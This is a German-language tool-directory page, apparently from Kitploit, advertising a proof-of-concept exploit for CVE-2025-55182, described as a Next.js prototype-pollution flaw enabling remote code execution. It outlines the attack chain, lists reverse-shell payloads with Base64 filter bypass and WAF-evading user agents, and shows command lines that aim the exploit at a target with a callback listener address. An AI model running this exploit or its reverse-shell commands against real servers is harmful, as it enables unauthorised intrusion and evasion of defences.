Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — Poc für CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/0xn7y/cve-2025-55182
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

Poc für CVE-2025-55182

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Next.js Prototype Pollution

CVE-2025-55182 ist eine kritische Prototype-Pollution-Schwachstelle in Next.js, die RCE durch unsachgemäße Eingabebereinigung im Request-Handling-Mechanismus des Frameworks ermöglicht. Das Ganze passiert, weil Next.js JSON-Objekte wie ein ahnungsloser Neuling vertraut.

POC

root@kitploit:~
1) Prototype Pollution im Request-Parsing: Next.js bereinigt Objekte, die die Prototyp-Kette verschmutzen können, nicht richtig.

2) Unsichere Deserialisierung: Das Framework erlaubt es JSON-Objekten, die Basis-Objekt-Prototypen zu modifizieren.

3) RCE über child_process durch Verschmutzung der Prototyp-Kette: Sobald der Prototyp verschmutzt ist, können wir die Logik kapern und den Server dazu bringen, Dinge auszuführen.

Einrichtung

root@kitploit:~
npm create [email protected] vuln

Kernfunktionen des Exploits

root@kitploit:~
1) Reverse-Shell-Payloads: Linux/Win Reverse-Shells
2) Base64-Kodierung, um Filter zu umgehen
3) Automatische Betriebssystemerkennung
4) Zufällige User-Agents zur Umgehung von WAFs
5) Wiederholungsschleifen bei Fehlschlag mit exponentiellem Backoff
6) Multi-Threading für gleichzeitige Exploit-Versuche zur Zuverlässigkeit
Tool herunterladen

Mit Base64-Kodierung (Umgehung)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

Aggressiver Modus mit Wiederholungen

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

Zufälligen User-Agent deaktivieren

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof